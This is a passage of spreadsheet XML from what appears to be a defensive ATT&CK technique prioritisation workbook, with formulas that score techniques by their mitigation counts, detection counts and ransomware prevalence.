      <c r="AJ261" s="25" t="str" cm="1">
        <f t="array" ref="AJ261">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC261)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK261" s="25">
        <f>IF(AJ261="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL261" s="25" t="str" cm="1">
        <f t="array" ref="AL261">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC261)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM261" s="25">
        <f>IF(AL261="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN261" s="52">
        <v>1</v>
      </c>
      <c r="AO261" s="51">
        <v>1</v>
      </c>
      <c r="AP261" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.0066666666666666E-2</v>
      </c>
      <c r="AQ261" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.12244444444444447</v>
      </c>
      <c r="AR261" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.12244444444444447</v>
      </c>
      <c r="AS261" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT261" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU26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62" spans="1:47" ht="32.1">
      <c r="A262" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1264761904761913E-2</v>
      </c>
      <c r="B262" s="25">
        <f>SUM(H262,M262,V262)*(1+SUM(AE262,AG262,AI262,AK262,AM262))</f>
        <v>0.31264761904761912</v>
      </c>
      <c r="C262" s="25" t="s">
        <v>1109</v>
      </c>
      <c r="D262" s="25" t="s">
        <v>99</v>
      </c>
      <c r="E262" s="25" t="s">
        <v>1110</v>
      </c>
      <c r="F262" s="51">
        <v>1</v>
      </c>
      <c r="G262" s="51">
        <v>1</v>
      </c>
      <c r="H262" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I262">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J262">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K262">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L262">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M262" s="25">
        <v>0</v>
      </c>
      <c r="N262" s="51">
        <v>0</v>
      </c>
      <c r="O262" s="51">
        <v>0</v>
      </c>
      <c r="P262" s="51">
        <v>0</v>
      </c>
      <c r="Q262" s="51">
        <v>5</v>
      </c>
      <c r="R262" s="52" t="s">
        <v>1111</v>
      </c>
      <c r="S262" s="51">
        <v>10</v>
      </c>
      <c r="T262" s="52" t="s">
        <v>1112</v>
      </c>
      <c r="U262" s="51">
        <v>6</v>
      </c>
      <c r="V262" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.1761904761904762</v>
      </c>
      <c r="W262">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>16</v>
      </c>
      <c r="X262">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Y262">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Z262">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA262">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB262">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC262" s="29" t="s">
        <v>1113</v>
      </c>
      <c r="AD262" s="25" t="str" cm="1">
        <f t="array" ref="AD262">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC262)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE262" s="25">
        <f>IF(AD262="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF262" s="25" t="str" cm="1">
        <f t="array" ref="AF262">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC262)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG262" s="25">
        <f>IF(AF262="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH262" s="25" t="str" cm="1">
        <f t="array" ref="AH262">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC262)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI262" s="25">
        <f>IF(AH262="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ262" s="25" t="str" cm="1">
        <f t="array" ref="AJ262">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC262)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK262" s="25">
        <f>IF(AJ262="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL262" s="25" t="str" cm="1">
        <f t="array" ref="AL262">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC262)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM262" s="25">
        <f>IF(AL262="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN262" s="60">
        <v>0</v>
      </c>
      <c r="AO262" s="51">
        <v>0</v>
      </c>
      <c r="AP262" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1264761904761913E-2</v>
      </c>
      <c r="AQ262" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10421587301587304</v>
      </c>
      <c r="AR262" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10421587301587304</v>
      </c>
      <c r="AS262" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT262" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU26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63" spans="1:47" ht="32.1">
      <c r="A263" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.7619047619047619E-2</v>
      </c>
      <c r="B263" s="25">
        <f>SUM(H263,M263,V263)*(1+SUM(AE263,AG263,AI263,AK263,AM263))</f>
        <v>0.27619047619047621</v>
      </c>
      <c r="C263" s="25" t="s">
        <v>1114</v>
      </c>
      <c r="D263" s="25" t="s">
        <v>175</v>
      </c>
      <c r="E263" s="25" t="s">
        <v>1115</v>
      </c>
      <c r="F263" s="51">
        <v>1</v>
      </c>
      <c r="G263" s="51">
        <v>1</v>
      </c>
      <c r="H263" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I263">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J263">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K263">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L263">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M263" s="25">
        <v>0</v>
      </c>
      <c r="N263" s="51">
        <v>1</v>
      </c>
      <c r="O263" s="51">
        <v>3</v>
      </c>
      <c r="P263" s="51">
        <v>1</v>
      </c>
      <c r="Q263" s="51">
        <v>0</v>
      </c>
      <c r="R263" s="52" t="s">
        <v>1116</v>
      </c>
      <c r="S263" s="51">
        <v>6</v>
      </c>
      <c r="T263" s="51" t="s">
        <v>1117</v>
      </c>
      <c r="U263" s="51">
        <v>10</v>
      </c>
      <c r="V263" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.1761904761904762</v>
      </c>
      <c r="W263">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>16</v>
      </c>
      <c r="X263">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Y263">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.29090909090909089</v>
      </c>
      <c r="Z263">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA263">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB263">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC263" s="29" t="s">
        <v>178</v>
      </c>
      <c r="AD263" s="25" t="str" cm="1">
        <f t="array" ref="AD263">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC263)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE263" s="25">
        <f>IF(AD263="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF263" s="25" t="str" cm="1">
        <f t="array" ref="AF263">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC263)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG263" s="25">
        <f>IF(AF263="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH263" s="25" t="str" cm="1">
        <f t="array" ref="AH263">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC263)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI263" s="25">
        <f>IF(AH263="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ263" s="25" t="str" cm="1">
        <f t="array" ref="AJ263">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC263)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK263" s="25">
        <f>IF(AJ263="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL263" s="25" t="str" cm="1">
        <f t="array" ref="AL263">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC263)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM263" s="25">
        <f>IF(AL263="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN263" s="60">
        <v>0</v>
      </c>
      <c r="AO263" s="51">
        <v>0</v>
      </c>
      <c r="AP263" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.7619047619047619E-2</v>
      </c>
      <c r="AQ263" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.2063492063492069E-2</v>
      </c>
      <c r="AR263" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.2063492063492069E-2</v>
      </c>
      <c r="AS263" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT263" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU26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64" spans="1:47" ht="48">
      <c r="A264" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.3087619047619046E-2</v>
      </c>
      <c r="B264" s="25">
        <f>SUM(H264,M264,V264)*(1+SUM(AE264,AG264,AI264,AK264,AM264))</f>
        <v>0.33087619047619049</v>
      </c>
      <c r="C264" s="25" t="s">
        <v>1118</v>
      </c>
      <c r="D264" s="25" t="s">
        <v>94</v>
      </c>
      <c r="E264" s="25" t="s">
        <v>1119</v>
      </c>
      <c r="F264" s="51">
        <v>1</v>
      </c>
      <c r="G264" s="51">
        <v>1</v>
      </c>
      <c r="H264" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I264">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J264">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K264">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L264">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M264" s="25">
        <v>0</v>
      </c>
      <c r="N264" s="51">
        <v>0</v>
      </c>
      <c r="O264" s="51">
        <v>1</v>
      </c>
      <c r="P264" s="51">
        <v>1</v>
      </c>
      <c r="Q264" s="51">
        <v>1</v>
      </c>
      <c r="R264" s="52" t="s">
        <v>1120</v>
      </c>
      <c r="S264" s="51">
        <v>6</v>
      </c>
      <c r="T264" s="52" t="s">
        <v>1121</v>
      </c>
      <c r="U264" s="51">
        <v>11</v>
      </c>
      <c r="V264" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.1761904761904762</v>
      </c>
      <c r="W264">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>17</v>
      </c>
      <c r="X264">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Y264">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Z264">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA264">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB264">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC264" s="29" t="s">
        <v>1122</v>
      </c>
      <c r="AD264" s="25" t="str" cm="1">
        <f t="array" ref="AD264">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC264)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE264" s="25">
        <f>IF(AD264="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF264" s="25" t="str" cm="1">
        <f t="array" ref="AF264">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC264)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG264" s="25">
        <f>IF(AF264="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH264" s="25" t="str" cm="1">
        <f t="array" ref="AH264">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC264)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI264" s="25">
        <f>IF(AH264="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ264" s="25" t="str" cm="1">
        <f t="array" ref="AJ264">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC264)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK264" s="25">
        <f>IF(AJ264="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL264" s="25" t="str" cm="1">
        <f t="array" ref="AL264">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC264)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM264" s="25">
        <f>IF(AL264="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN264" s="60">
        <v>0</v>
      </c>
      <c r="AO264" s="51">
        <v>0</v>
      </c>
      <c r="AP264" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.3087619047619046E-2</v>
      </c>
      <c r="AQ264" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1102920634920635</v>
      </c>
      <c r="AR264" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1102920634920635</v>
      </c>
      <c r="AS264" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT264" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU26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65" spans="1:47">
      <c r="A265" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.3087619047619046E-2</v>
      </c>
      <c r="B265" s="25">
        <f>SUM(H265,M265,V265)*(1+SUM(AE265,AG265,AI265,AK265,AM265))</f>
        <v>0.33087619047619049</v>
      </c>
      <c r="C265" s="25" t="s">
        <v>1123</v>
      </c>
      <c r="D265" s="25" t="s">
        <v>984</v>
      </c>
      <c r="E265" s="25" t="s">
        <v>1124</v>
      </c>
      <c r="F265" s="51">
        <v>1</v>
      </c>
      <c r="G265" s="51">
        <v>1</v>
      </c>
      <c r="H265" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I265">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J265">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K265">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L265">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M265" s="25">
        <v>0</v>
      </c>
      <c r="N265" s="51">
        <v>0</v>
      </c>
      <c r="O265" s="51">
        <v>0</v>
      </c>
      <c r="P265" s="51">
        <v>0</v>
      </c>
      <c r="Q265" s="51">
        <v>3</v>
      </c>
      <c r="R265" s="52" t="s">
        <v>1125</v>
      </c>
      <c r="S265" s="51">
        <v>4</v>
      </c>
      <c r="T265" s="51" t="s">
        <v>1126</v>
      </c>
      <c r="U265" s="51">
        <v>13</v>
      </c>
      <c r="V265" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.1761904761904762</v>
      </c>
      <c r="W265">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>17</v>
      </c>
      <c r="X265">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Y265">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Z265">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA265">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB265">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC265" s="29" t="s">
        <v>97</v>
      </c>
      <c r="AD265" s="25" t="str" cm="1">
        <f t="array" ref="AD265">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC265)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE265" s="25">
        <f>IF(AD265="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF265" s="25" t="str" cm="1">
        <f t="array" ref="AF265">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC265)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG265" s="25">
        <f>IF(AF265="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH265" s="25" t="str" cm="1">
        <f t="array" ref="AH265">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC265)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI265" s="25">
        <f>IF(AH265="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ265" s="25" t="str" cm="1">
        <f t="array" ref="AJ265">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC265)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK265" s="25">
        <f>IF(AJ265="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL265" s="25" t="str" cm="1">
        <f t="array" ref="AL265">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC265)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM265" s="25">
        <f>IF(AL265="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN265" s="60">
        <v>0</v>
      </c>
      <c r="AO265" s="51">
        <v>0</v>
      </c>
      <c r="AP265" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.3087619047619046E-2</v>
      </c>
      <c r="AQ265" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1102920634920635</v>
      </c>
      <c r="AR265" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1102920634920635</v>
      </c>
      <c r="AS265" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT265" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU26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66" spans="1:47">
      <c r="A266" s="25">
